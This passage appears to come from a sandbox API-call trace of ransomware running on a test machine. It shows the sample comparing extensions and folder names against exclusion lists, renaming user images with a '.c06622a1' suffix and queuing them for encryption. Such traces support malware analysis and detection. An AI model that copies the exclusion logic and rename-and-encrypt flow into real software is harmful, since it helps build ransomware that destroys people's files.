(_Str1="lnk", _Str2="png") returned -4 [0167.164] wcslen (_String="lnk") returned 0x3 [0167.164] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0167.164] wcslen (_String="mod") returned 0x3 [0167.164] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0167.164] wcslen (_String="mpa") returned 0x3 [0167.164] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0167.164] wcslen (_String="msc") returned 0x3 [0167.164] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0167.164] wcslen (_String="msp") returned 0x3 [0167.164] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0167.164] wcslen (_String="msstyles") returned 0x8 [0167.164] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0167.164] wcslen (_String="msu") returned 0x3 [0167.165] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0167.165] wcslen (_String="nls") returned 0x3 [0167.165] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0167.165] wcslen (_String="nomedia") returned 0x7 [0167.165] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0167.165] wcslen (_String="ocx") returned 0x3 [0167.165] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0167.165] wcslen (_String="prf") returned 0x3 [0167.165] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0167.165] wcslen (_String="ps1") returned 0x3 [0167.165] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0167.165] wcslen (_String="rom") returned 0x3 [0167.165] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0167.165] wcslen (_String="rtp") returned 0x3 [0167.165] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0167.165] wcslen (_String="scr") returned 0x3 [0167.165] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0167.165] wcslen (_String="shs") returned 0x3 [0167.165] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0167.165] wcslen (_String="spl") returned 0x3 [0167.165] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0167.165] wcslen (_String="sys") returned 0x3 [0167.165] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0167.165] wcslen (_String="theme") returned 0x5 [0167.165] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0167.165] wcslen (_String="themepack") returned 0x9 [0167.165] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0167.165] wcslen (_String="wpx") returned 0x3 [0167.165] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0167.165] wcslen (_String="lock") returned 0x4 [0167.165] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0167.165] wcslen (_String="key") returned 0x3 [0167.165] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0167.165] wcslen (_String="hta") returned 0x3 [0167.166] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0167.166] wcslen (_String="msi") returned 0x3 [0167.166] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0167.166] wcslen (_String="pdb") returned 0x3 [0167.166] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0167.166] wcslen (_String="sqlite") returned 0x6 [0167.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo")) returned 0x10 [0167.166] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0167.166] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" [0167.166] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned 0x48 [0167.166] wcscpy (in: _Dest=0x3282112, _Source="7ZCJwAfR5VGvVkS.png" | out: _Dest="7ZCJwAfR5VGvVkS.png") returned="7ZCJwAfR5VGvVkS.png" [0167.166] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\7ZCJwAfR5VGvVkS.png", dwFileAttributes=0x80) returned 1 [0167.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\7ZCJwAfR5VGvVkS.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\7zcjwafr5vgvvks.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0167.169] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.169] ReadFile (in: hFile=0x1e4, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0167.170] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0x3fe24856 [0167.170] RtlComputeCrc32 (PartialCrc=0x4856, Buffer=0x32e724, Length=0x80) returned 0x7502ac2 [0167.170] RtlComputeCrc32 (PartialCrc=0x2ac2, Buffer=0x32e724, Length=0x80) returned 0x667243da [0167.170] RtlComputeCrc32 (PartialCrc=0x43da, Buffer=0x32e724, Length=0x80) returned 0xaf6be6c3 [0167.170] RtlComputeCrc32 (PartialCrc=0xe6c3, Buffer=0x32e724, Length=0x80) returned 0x2e71a369 [0167.170] CloseHandle (hObject=0x1e4) returned 1 [0167.170] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3292088 [0167.170] wcscpy (in: _Dest=0x3292088, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\7ZCJwAfR5VGvVkS.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\7ZCJwAfR5VGvVkS.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\7ZCJwAfR5VGvVkS.png" [0167.170] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\7ZCJwAfR5VGvVkS.png") returned 0x5c [0167.170] wcscpy (in: _Dest=0x3292140, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.170] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\7ZCJwAfR5VGvVkS.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\7zcjwafr5vgvvks.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\7ZCJwAfR5VGvVkS.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\7zcjwafr5vgvvks.png.c06622a1"), dwFlags=0x8) returned 1 [0167.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\7ZCJwAfR5VGvVkS.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\7zcjwafr5vgvvks.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e4 [0167.176] CreateIoCompletionPort (FileHandle=0x1e4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.176] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0167.181] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xa64aa31 [0167.181] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x20c2cf0a [0167.181] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x12eaec85 [0167.181] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x491760e1 [0167.181] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7971f48d [0167.182] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x75fccdc8 [0167.182] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6ad595c6 [0167.182] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2abebe24 [0167.185] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x4f766ad4 [0167.185] RtlComputeCrc32 (PartialCrc=0x6ad4, Buffer=0x710094, Length=0x80) returned 0x1f61c8e8 [0167.185] RtlComputeCrc32 (PartialCrc=0xc8e8, Buffer=0x710094, Length=0x80) returned 0xbc360d0 [0167.185] RtlComputeCrc32 (PartialCrc=0x60d0, Buffer=0x710094, Length=0x80) returned 0x228a06b6 [0167.185] RtlComputeCrc32 (PartialCrc=0x6b6, Buffer=0x710094, Length=0x80) returned 0xc6636613 [0167.185] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.185] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0167.186] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3292088) returned 1 [0167.187] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbab12420, ftCreationTime.dwHighDateTime=0x1d5e66e, ftLastAccessTime.dwLowDateTime=0x46e4b330, ftLastAccessTime.dwHighDateTime=0x1d5dbe3, ftLastWriteTime.dwLowDateTime=0x46e4b330, ftLastWriteTime.dwHighDateTime=0x1d5dbe3, nFileSizeHigh=0x0, nFileSizeLow=0x12ef4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BbFc02.bmp", cAlternateFileName="")) returned 1 [0167.187] _wcsicmp (_Str1="BbFc02.bmp", _Str2="README.c06622a1.TXT") returned -16 [0167.187] wcsstr (_Str="BbFc02.bmp", _SubStr="README") returned 0x0 [0167.187] _wcsicmp (_Str1="autorun.inf", _Str2="BbFc02.bmp") returned -1 [0167.187] wcslen (_String="autorun.inf") returned 0xb [0167.187] _wcsicmp (_Str1="boot.ini", _Str2="BbFc02.bmp") returned 13 [0167.187] wcslen (_String="boot.ini") returned 0x8 [0167.187] _wcsicmp (_Str1="bootfont.bin", _Str2="BbFc02.bmp") returned 13 [0167.187] wcslen (_String="bootfont.bin") returned 0xc [0167.187] _wcsicmp (_Str1="bootsect.bak", _Str2="BbFc02.bmp") returned 13 [0167.187] wcslen (_String="bootsect.bak") returned 0xc [0167.187] _wcsicmp (_Str1="desktop.ini", _Str2="BbFc02.bmp") returned 2 [0167.187] wcslen (_String="desktop.ini") returned 0xb [0167.187] _wcsicmp (_Str1="iconcache.db", _Str2="BbFc02.bmp") returned 7 [0167.187] wcslen (_String="iconcache.db") returned 0xc [0167.187] _wcsicmp (_Str1="ntldr", _Str2="BbFc02.bmp") returned 12 [0167.187] wcslen (_String="ntldr") returned 0x5 [0167.187] _wcsicmp (_Str1="ntuser.dat", _Str2="BbFc02.bmp") returned 12 [0167.187] wcslen (_String="ntuser.dat") returned 0xa [0167.188] _wcsicmp (_Str1="ntuser.dat.log", _Str2="BbFc02.bmp") returned 12 [0167.188] wcslen (_String="ntuser.dat.log") returned 0xe [0167.188] _wcsicmp (_Str1="ntuser.ini", _Str2="BbFc02.bmp") returned 12 [0167.188] wcslen (_String="ntuser.ini") returned 0xa [0167.188] _wcsicmp (_Str1="thumbs.db", _Str2="BbFc02.bmp") returned 18 [0167.188] wcslen (_String="thumbs.db") returned 0x9 [0167.188] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0167.188] wcslen (_String="386") returned 0x3 [0167.188] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0167.188] wcslen (_String="adv") returned 0x3 [0167.188] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0167.188] wcslen (_String="ani") returned 0x3 [0167.188] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0167.188] wcslen (_String="bat") returned 0x3 [0167.188] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0167.188] wcslen (_String="bin") returned 0x3 [0167.188] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0167.188] wcslen (_String="cab") returned 0x3 [0167.188] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0167.188] wcslen (_String="cmd") returned 0x3 [0167.188] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0167.189] wcslen (_String="com") returned 0x3 [0167.189] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0167.189] wcslen (_String="cpl") returned 0x3 [0167.189] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0167.189] wcslen (_String="cur") returned 0x3 [0167.189] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0167.189] wcslen (_String="deskthemepack") returned 0xd [0167.189] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0167.189] wcslen (_String="diagcab") returned 0x7 [0167.189] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0167.189] wcslen (_String="diagcfg") returned 0x7 [0167.189] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0167.189] wcslen (_String="diagpkg") returned 0x7 [0167.189] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0167.189] wcslen (_String="dll") returned 0x3 [0167.189] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0167.189] wcslen (_String="drv") returned 0x3 [0167.189] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0167.189] wcslen (_String="exe") returned 0x3 [0167.189] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0167.189] wcslen (_String="hlp") returned 0x3 [0167.189] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0167.189] wcslen (_String="icl") returned 0x3 [0167.189] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0167.189] wcslen (_String="icns") returned 0x4 [0167.189] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0167.189] wcslen (_String="ico") returned 0x3 [0167.189] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0167.189] wcslen (_String="ics") returned 0x3 [0167.190] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0167.190] wcslen (_String="idx") returned 0x3 [0167.190] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0167.190] wcslen (_String="ldf") returned 0x3 [0167.190] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0167.190] wcslen (_String="lnk") returned 0x3 [0167.190] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0167.190] wcslen (_String="mod") returned 0x3 [0167.190] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0167.190] wcslen (_String="mpa") returned 0x3 [0167.190] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0167.190] wcslen (_String="msc") returned 0x3 [0167.190] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0167.190] wcslen (_String="msp") returned 0x3 [0167.190] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0167.190] wcslen (_String="msstyles") returned 0x8 [0167.190] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0167.190] wcslen (_String="msu") returned 0x3 [0167.190] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0167.190] wcslen (_String="nls") returned 0x3 [0167.190] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0167.190] wcslen (_String="nomedia") returned 0x7 [0167.190] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0167.190] wcslen (_String="ocx") returned 0x3 [0167.190] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0167.190] wcslen (_String="prf") returned 0x3 [0167.190] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0167.190] wcslen (_String="ps1") returned 0x3 [0167.190] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0167.190] wcslen (_String="rom") returned 0x3 [0167.190] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0167.190] wcslen (_String="rtp") returned 0x3 [0167.191] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0167.191] wcslen (_String="scr") returned 0x3 [0167.191] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0167.191] wcslen (_String="shs") returned 0x3 [0167.191] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0167.191] wcslen (_String="spl") returned 0x3 [0167.191] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0167.191] wcslen (_String="sys") returned 0x3 [0167.191] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0167.191] wcslen (_String="theme") returned 0x5 [0167.191] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0167.191] wcslen (_String="themepack") returned 0x9 [0167.191] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0167.191] wcslen (_String="wpx") returned 0x3 [0167.191] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0167.191] wcslen (_String="lock") returned 0x4 [0167.191] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0167.191] wcslen (_String="key") returned 0x3 [0167.191] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0167.191] wcslen (_String="hta") returned 0x3 [0167.191] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0167.191] wcslen (_String="msi") returned 0x3 [0167.191] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0167.191] wcslen (_String="pdb") returned 0x3 [0167.191] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0167.191] wcslen (_String="sqlite") returned 0x6 [0167.191] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo")) returned 0x10 [0167.192] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0167.192] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" [0167.192] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned 0x48 [0167.192] wcscpy (in: _Dest=0x3282112, _Source="BbFc02.bmp" | out: _Dest="BbFc02.bmp") returned="BbFc02.bmp" [0167.192] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\BbFc02.bmp", dwFileAttributes=0x80) returned 1 [0167.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\BbFc02.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\bbfc02.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0167.192] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.192] ReadFile (in: hFile=0x1ec, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0167.193] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0x7a0a48c4 [0167.193] RtlComputeCrc32 (PartialCrc=0x48c4, Buffer=0x32e724, Length=0x80) returned 0x8eebc100 [0167.193] RtlComputeCrc32 (PartialCrc=0xc100, Buffer=0x32e724, Length=0x80) returned 0xccd48433 [0167.193] RtlComputeCrc32 (PartialCrc=0x8433, Buffer=0x32e724, Length=0x80) returned 0xeac47918 [0167.193] RtlComputeCrc32 (PartialCrc=0x7918, Buffer=0x32e724, Length=0x80) returned 0xb88655ee [0167.193] CloseHandle (hObject=0x1ec) returned 1 [0167.193] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3292088 [0167.193] wcscpy (in: _Dest=0x3292088, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\BbFc02.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\BbFc02.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\BbFc02.bmp" [0167.194] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\BbFc02.bmp") returned 0x53 [0167.194] wcscpy (in: _Dest=0x329212e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.194] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\BbFc02.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\bbfc02.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\BbFc02.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\bbfc02.bmp.c06622a1"), dwFlags=0x8) returned 1 [0167.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\BbFc02.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\bbfc02.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ec [0167.197] CreateIoCompletionPort (FileHandle=0x1ec, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0167.197] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0167.205] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x28eb025d [0167.205] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3525f568 [0167.205] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d85f156 [0167.205] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x76f216a2 [0167.205] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x61c80d97 [0167.205] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2bf79b2c [0167.205] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x721a157b [0167.205] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1145cff0 [0167.209] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x58da2c2 [0167.209] RtlComputeCrc32 (PartialCrc=0xa2c2, Buffer=0x2690094, Length=0x80) returned 0xe31b2f2 [0167.209] RtlComputeCrc32 (PartialCrc=0xb2f2, Buffer=0x2690094, Length=0x80) returned 0xeafc45f7 [0167.209] RtlComputeCrc32 (PartialCrc=0x45f7, Buffer=0x2690094, Length=0x80) returned 0x94867aa2 [0167.209] RtlComputeCrc32 (PartialCrc=0x7aa2, Buffer=0x2690094, Length=0x80) returned 0xaf4e58b2 [0167.209] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0167.209] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0167.210] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3292088) returned 1 [0167.211] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b929b70, ftCreationTime.dwHighDateTime=0x1d5dc8d, ftLastAccessTime.dwLowDateTime=0xed4798f0, ftLastAccessTime.dwHighDateTime=0x1d5e750, ftLastWriteTime.dwLowDateTime=0xed4798f0, ftLastWriteTime.dwHighDateTime=0x1d5e750, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CD22", cAlternateFileName="")) returned 1 [0167.211] _wcsicmp (_Str1="$recycle.bin", _Str2="CD22") returned -63 [0167.211] wcslen (_String="$recycle.bin") returned 0xc [0167.211] _wcsicmp (_Str1="config.msi", _Str2="CD22") returned 11 [0167.211] wcslen (_String="config.msi") returned 0xa [0167.211] _wcsicmp (_Str1="$windows.~bt", _Str2="CD22") returned -63 [0167.211] wcslen (_String="$windows.~bt") returned 0xc [0167.211] _wcsicmp (_Str1="$windows.~ws", _Str2="CD22") returned -63 [0167.211] wcslen (_String="$windows.~ws") returned 0xc [0167.211] _wcsicmp (_Str1="windows", _Str2="CD22") returned 20 [0167.211] wcslen (_String="windows") returned 0x7 [0167.211] _wcsicmp (_Str1="appdata", _Str2="CD22") returned -2 [0167.211] wcslen (_String="appdata") returned 0x7 [0167.211] _wcsicmp (_Str1="application data", _Str2="CD22") returned -2 [0167.211] wcslen (_String="application data") returned 0x10 [0167.211] _wcsicmp (_Str1="boot", _Str2="CD22") returned -1 [0167.211] wcslen (_String="boot") returned 0x4 [0167.211] _wcsicmp (_Str1="google", _Str2="CD22") returned 4 [0167.211] wcslen (_String="google") returned 0x6 [0167.211] _wcsicmp (_Str1="mozilla", _Str2="CD22") returned 10 [0167.211] wcslen (_String="mozilla") returned 0x7 [0167.211] _wcsicmp (_Str1="program files", _Str2="CD22") returned 13 [0167.211] wcslen (_String="program files") returned 0xd [0167.211] _wcsicmp (_Str1="program files (x86)", _Str2="CD22") returned 13 [0167.211] wcslen (_String="program files (x86)") returned 0x13 [0167.212] _wcsicmp (_Str1="programdata", _Str2="CD22") returned 13 [0167.212] wcslen (_String="programdata") returned 0xb [0167.212] _wcsicmp (_Str1="system volume information", _Str2="CD22") returned 16 [0167.212] wcslen (_String="system volume information") returned 0x19 [0167.212] _wcsicmp (_Str1="tor browser", _Str2="CD22") returned 17 [0167.212] wcslen (_String="tor browser") returned 0xb [0167.212] _wcsicmp (_Str1="windows.old", _Str2="CD22") returned 20 [0167.212] wcslen (_String="windows.old") returned 0xb [0167.212] _wcsicmp 